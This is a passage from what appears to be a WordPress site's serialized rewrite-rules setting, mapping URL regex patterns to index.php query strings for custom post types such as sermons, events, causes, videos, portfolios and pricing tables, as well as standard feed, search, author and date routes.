+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?eventbrite_tag=$matches[1]&paged=$matches[2]\";s:25:\"eventbrite_tag/([^/]+)/?$\";s:36:\"index.php?eventbrite_tag=$matches[1]\";s:42:\"mailmunch_page/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"mailmunch_page/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"mailmunch_page/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"mailmunch_page/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"mailmunch_page/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"mailmunch_page/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"mailmunch_page/([^/]+)/embed/?$\";s:47:\"index.php?mailmunch_page=$matches[1]&embed=true\";s:35:\"mailmunch_page/([^/]+)/trackback/?$\";s:41:\"index.php?mailmunch_page=$matches[1]&tb=1\";s:43:\"mailmunch_page/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?mailmunch_page=$matches[1]&paged=$matches[2]\";s:50:\"mailmunch_page/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?mailmunch_page=$matches[1]&cpage=$matches[2]\";s:39:\"mailmunch_page/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?mailmunch_page=$matches[1]&page=$matches[2]\";s:31:\"mailmunch_page/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"mailmunch_page/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"mailmunch_page/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"mailmunch_page/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"mailmunch_page/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"mailmunch_page/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"cause/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"cause/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"cause/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"cause/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"cause/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"cause/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:22:\"cause/([^/]+)/embed/?$\";s:38:\"index.php?cause=$matches[1]&embed=true\";s:26:\"cause/([^/]+)/trackback/?$\";s:32:\"index.php?cause=$matches[1]&tb=1\";s:34:\"cause/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?cause=$matches[1]&paged=$matches[2]\";s:41:\"cause/([^/]+)/comment-page-([0-9]{1,})/?$\";s:45:\"index.php?cause=$matches[1]&cpage=$matches[2]\";s:30:\"cause/([^/]+)(?:/([0-9]+))?/?$\";s:44:\"index.php?cause=$matches[1]&page=$matches[2]\";s:22:\"cause/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:32:\"cause/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:52:\"cause/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"cause/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"cause/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:28:\"cause/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:34:\"sermon/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"sermon/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"sermon/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"sermon/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"sermon/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"sermon/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:23:\"sermon/([^/]+)/embed/?$\";s:39:\"index.php?sermon=$matches[1]&embed=true\";s:27:\"sermon/([^/]+)/trackback/?$\";s:33:\"index.php?sermon=$matches[1]&tb=1\";s:35:\"sermon/([^/]+)/page/?([0-9]{1,})/?$\";s:46:\"index.php?sermon=$matches[1]&paged=$matches[2]\";s:42:\"sermon/([^/]+)/comment-page-([0-9]{1,})/?$\";s:46:\"index.php?sermon=$matches[1]&cpage=$matches[2]\";s:31:\"sermon/([^/]+)(?:/([0-9]+))?/?$\";s:45:\"index.php?sermon=$matches[1]&page=$matches[2]\";s:23:\"sermon/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:33:\"sermon/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:53:\"sermon/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"sermon/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"sermon/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:29:\"sermon/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"event/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"event/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"event/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"event/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"event/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"event/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:22:\"event/([^/]+)/embed/?$\";s:38:\"index.php?event=$matches[1]&embed=true\";s:26:\"event/([^/]+)/trackback/?$\";s:32:\"index.php?event=$matches[1]&tb=1\";s:34:\"event/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?event=$matches[1]&paged=$matches[2]\";s:41:\"event/([^/]+)/comment-page-([0-9]{1,})/?$\";s:45:\"index.php?event=$matches[1]&cpage=$matches[2]\";s:30:\"event/([^/]+)(?:/([0-9]+))?/?$\";s:44:\"index.php?event=$matches[1]&page=$matches[2]\";s:22:\"event/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:32:\"event/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:52:\"event/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"event/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"event/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:28:\"event/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:37:\"ts_slider/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"ts_slider/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"ts_slider/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"ts_slider/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"ts_slider/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"ts_slider/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"ts_slider/([^/]+)/embed/?$\";s:42:\"index.php?ts_slider=$matches[1]&embed=true\";s:30:\"ts_slider/([^/]+)/trackback/?$\";s:36:\"index.php?ts_slider=$matches[1]&tb=1\";s:38:\"ts_slider/([^/]+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?ts_slider=$matches[1]&paged=$matches[2]\";s:45:\"ts_slider/([^/]+)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?ts_slider=$matches[1]&cpage=$matches[2]\";s:34:\"ts_slider/([^/]+)(?:/([0-9]+))?/?$\";s:48:\"index.php?ts_slider=$matches[1]&page=$matches[2]\";s:26:\"ts_slider/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:36:\"ts_slider/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:56:\"ts_slider/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"ts_slider/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"ts_slider/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"ts_slider/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"video/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"video/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"video/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"video/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"video/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"video/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:22:\"video/([^/]+)/embed/?$\";s:38:\"index.php?video=$matches[1]&embed=true\";s:26:\"video/([^/]+)/trackback/?$\";s:32:\"index.php?video=$matches[1]&tb=1\";s:34:\"video/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?video=$matches[1]&paged=$matches[2]\";s:41:\"video/([^/]+)/comment-page-([0-9]{1,})/?$\";s:45:\"index.php?video=$matches[1]&cpage=$matches[2]\";s:30:\"video/([^/]+)(?:/([0-9]+))?/?$\";s:44:\"index.php?video=$matches[1]&page=$matches[2]\";s:22:\"video/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:32:\"video/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:52:\"video/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"video/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"video/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:28:\"video/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:36:\"ts_teams/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:46:\"ts_teams/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:66:\"ts_teams/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"ts_teams/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"ts_teams/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:42:\"ts_teams/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:25:\"ts_teams/([^/]+)/embed/?$\";s:41:\"index.php?ts_teams=$matches[1]&embed=true\";s:29:\"ts_teams/([^/]+)/trackback/?$\";s:35:\"index.php?ts_teams=$matches[1]&tb=1\";s:37:\"ts_teams/([^/]+)/page/?([0-9]{1,})/?$\";s:48:\"index.php?ts_teams=$matches[1]&paged=$matches[2]\";s:44:\"ts_teams/([^/]+)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?ts_teams=$matches[1]&cpage=$matches[2]\";s:33:\"ts_teams/([^/]+)(?:/([0-9]+))?/?$\";s:47:\"index.php?ts_teams=$matches[1]&page=$matches[2]\";s:25:\"ts_teams/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:35:\"ts_teams/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:55:\"ts_teams/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"ts_teams/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"ts_teams/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"ts_teams/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:46:\"teams/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?teams=$matches[1]&feed=$matches[2]\";s:41:\"teams/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?teams=$matches[1]&feed=$matches[2]\";s:22:\"teams/([^/]+)/embed/?$\";s:38:\"index.php?teams=$matches[1]&embed=true\";s:34:\"teams/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?teams=$matches[1]&paged=$matches[2]\";s:16:\"teams/([^/]+)/?$\";s:27:\"index.php?teams=$matches[1]\";s:37:\"portfolio/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"portfolio/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"portfolio/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"portfolio/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"portfolio/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"portfolio/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"portfolio/([^/]+)/embed/?$\";s:42:\"index.php?portfolio=$matches[1]&embed=true\";s:30:\"portfolio/([^/]+)/trackback/?$\";s:36:\"index.php?portfolio=$matches[1]&tb=1\";s:38:\"portfolio/([^/]+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&paged=$matches[2]\";s:45:\"portfolio/([^/]+)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&cpage=$matches[2]\";s:34:\"portfolio/([^/]+)(?:/([0-9]+))?/?$\";s:48:\"index.php?portfolio=$matches[1]&page=$matches[2]\";s:26:\"portfolio/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:36:\"portfolio/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:56:\"portfolio/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"portfolio/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"portfolio/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"portfolio/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:61:\"portfolio-categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:67:\"index.php?portfolio_register_post_type=$matches[1]&feed=$matches[2]\";s:56:\"portfolio-categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:67:\"index.php?portfolio_register_post_type=$matches[1]&feed=$matches[2]\";s:37:\"portfolio-categories/([^/]+)/embed/?$\";s:61:\"index.php?portfolio_register_post_type=$matches[1]&embed=true\";s:49:\"portfolio-categories/([^/]+)/page/?([0-9]{1,})/?$\";s:68:\"index.php?portfolio_register_post_type=$matches[1]&paged=$matches[2]\";s:31:\"portfolio-categories/([^/]+)/?$\";s:50:\"index.php?portfolio_register_post_type=$matches[1]\";s:44:\"ts_pricing_table/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"ts_pricing_table/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"ts_pricing_table/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"ts_pricing_table/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"ts_pricing_table/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"ts_pricing_table/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"ts_pricing_table/([^/]+)/embed/?$\";s:49:\"index.php?ts_pricing_table=$matches[1]&embed=true\";s:37:\"ts_pricing_table/([^/]+)/trackback/?$\";s:43:\"index.php?ts_pricing_table=$matches[1]&tb=1\";s:45:\"ts_pricing_table/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?ts_pricing_table=$matches[1]&paged=$matches[2]\";s:52:\"ts_pricing_table/([^/]+)/comment-page-([0-9]{1,})/?$\";s:56:\"index.php?ts_pricing_table=$matches[1]&cpage=$matches[2]\";s:41:\"ts_pricing_table/([^/]+)(?:/([0-9]+))?/?$\";s:55:\"index.php?ts_pricing_table=$matches[1]&page=$matches[2]\";s:33:\"ts_pricing_table/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"ts_pricing_table/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"ts_pricing_table/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"ts_pricing_table/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"ts_pricing_table/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"ts_pricing_table/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:68:\"ts_pricing_table-categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?ts_pricing_table_categories=$matches[1]&feed=$matches[2]\";s:63:\"ts_pricing_table-categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?ts_pricing_table_categories=$matches[1]&feed=$matches[2]\";s:44:\"ts_pricing_table-categories/([^/]+)/embed/?$\";s:60:\"index.php?ts_pricing_table_categories=$matches[1]&embed=true\";s:56:\"ts_pricing_table-categories/([^/]+)/page/?([0-9]{1,})/?$\";s:67:\"index.php?ts_pricing_table_categories=$matches[1]&paged=$matches[2]\";s:38:\"ts_pricing_table-categories/([^/]+)/?$\";s:49:\"index.php?ts_pricing_table_categories=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=6&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"